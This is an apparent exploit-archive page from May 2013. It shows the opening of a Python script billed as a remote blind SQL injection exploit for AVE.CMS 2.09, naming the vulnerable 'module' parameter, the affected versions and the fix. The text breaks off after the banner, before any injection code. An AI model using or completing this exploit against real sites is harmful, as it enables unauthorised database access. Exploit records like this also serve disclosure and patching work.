Home / exploits AVE.CMS 2.09 Blind SQL Injection
Posted on 24 May 2013
#!/usr/bin/env python import urllib, sys, time ####################################################################################### # Exploit Title: AVE.CMS <= 2.09 - Remote Blind SQL Injection Exploit # Date: 23/05/2013 # Author: mr.pr0n (@_pr0n_) # Homepage: http://ghostinthelab.wordpress.com/ # Vendor Homepage: http://www.overdoze.ru/ # Software Link: websvn.avecms.ru/listing.php?repname=AVE.cms+2.09 # Version: V2.09 and 2.09RC2 # Tested on: Linux Debian 2.6.32-5-686 # Description: The "module" parameter is vulnerable to Blind SQL Injection. # Solution : Update to newest version. ####################################################################################### print "+----------------------------------------------------------+" print "| AVE.CMS <= 2.09 - Remote Blind SQL Injection Exploit |" print "| mr.pr0n - http://ghostinthelab.wordpress.com |" print "+----------------------------------------------------------+" ## GREEN = '
